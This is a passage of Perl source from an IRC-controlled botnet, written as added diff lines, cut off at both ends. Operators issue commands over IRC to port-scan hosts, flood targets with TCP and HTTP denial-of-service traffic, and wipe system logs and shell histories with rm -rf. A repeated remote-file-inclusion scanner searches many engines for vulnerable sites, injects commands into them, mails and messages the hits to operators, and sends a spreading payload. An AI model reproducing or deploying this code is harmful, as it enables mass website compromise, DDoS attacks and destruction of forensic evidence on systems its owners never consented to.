$printl :12[4@Portscan12]12 Scanning for open ports on  4".$1." 12 started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 Open ports founded: @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 No open ports foundend."); + } +} + +###################### +# End of Portscan # +###################### + +###################### +# Nmap # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 9: $1 12.:15Ports12:. 9 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15Founded 9 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15Complete"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +###################### + +###################### +# Log Cleaner # +###################### +if ($funcarg =~ /^logcleaner/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] This process can be long, just wait"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] All default log and bash_history files erased"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Now Erasing the rest of the machine log files"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Done! All logs erased"); + } +###################### +# End of Log Cleaner # +###################### + +###################### +# Join And Part # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +###################### + +###################### +# TCPFlood # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@TCP-DDOS12] Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :12[4@TCP-DDOS12] Attack done 4 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +###################### + +###################### +# EXTREME SCANNER # +###################### + +############ +## GOOGLE ## +############ +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 15RFI Scanner is started for 4$dork"); +### End of Start Message +# Starting The Search Engine + my @google=&googlet($dork); +# +push(my @tot, @google); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12G4o8o12g9l4e12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12G4o8o12g9l4e12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12G4o8o12g9l4e1212] 2(12SafeMode:3OFF2) 4 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2,1[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); + +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12G4o8o12g9l4e1212] 2(12SafeMode:4ON2) 3 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +############ +## UOL ## +############ +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; + + +my @uollist=&uol($dork); + +push(my @tot, @uollist); + +my @puliti=&unici(@tot); + + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12UOL12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for2 $dork "); + +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12UOL12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12UOL12] 2(12SafeMode:3OFF2) 4 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2,1[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL );; + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12UOL12] 2(12SafeMode:4ON2) 3 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + + +############### +## AllTheWeb ## +############### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alltheweb=&allthewebt($dork); + my @allweb=&standard($dork); +# +push(my @tot, @alltheweb, @allweb); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AllTheWeb12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AllTheWeb12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AllTheWeb12] 2(12SafeMode:4OFF2) 3 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AllTheWeb12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + + +############### +## GigaBlast ## +############### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @gigalist=&gigablast($dork); + +push(my @tot, @gigalist); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7GigaBlast12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7GigaBlast12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7GigaBlast12] 2(12SafeMode:4OFF2) 3 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7GigaBlast12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: ON\@target.com\n"; +print MAIL "To: superbot.scan\@gmail.com\n"; +print MAIL "Subject: [SafeMode:ON]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +######### +## AOL ## +######### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine +# + my @aollist=&aol($dork); + push(my @tot, @aollist); + +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AOL12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AOL12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AOL12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AOL12] 2(12SafeMode:4ON2) 3 $print "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +########### +## Yahoo ## +########### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ylist=&yahoo($dork); + +push(my @tot, @ylist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 13Y6ahoo4!12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 13Y6ahoo4!12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[13Y6ahoo4!12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[13Y6ahoo4!12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +######### +## MSN ## +######### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mlist=&msn($dork); +push(my @tot, @mlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7M4S7N12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7M4S7N12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7M4S7N12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7M4S7N12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +######### +## ASK ## +######### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @asklist=&ask($dork); +push(my @tot, @asklist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 14A4S14K12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 14A4S14K12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[14A4S14K12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[14A4S14K12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +############## +## FireBall ## +############## +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @fireball=fireball($dork); +push(my @tot, @fireball); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 4F1ire4B1all12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 4F1ire4B1all12 finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4F1ire4B1all12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MaXiMiZeR/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4F1ire4B1all12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) "); + sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print "); + +open ( MAIL, "| /usr/lib/sendmail -t" ); +print MAIL "From: OFF\@target.com\n"; +print MAIL "To: shefutz2007\@yahoo.com\n"; +print MAIL "Subject: [SafeMode:OFF]\n\n"; +print MAIL " $print \n"; +print MAIL "\n.\n"; +close ( MAIL ); + +my $test2="http://".$sito.$bug.$spread2."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} +####################### +#End of EXTREMESCANNER# +####################### + +###################### +# HTTPFlood # +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds ."); +my $itime = time; +my ($cur_time); +$cur_time = time - 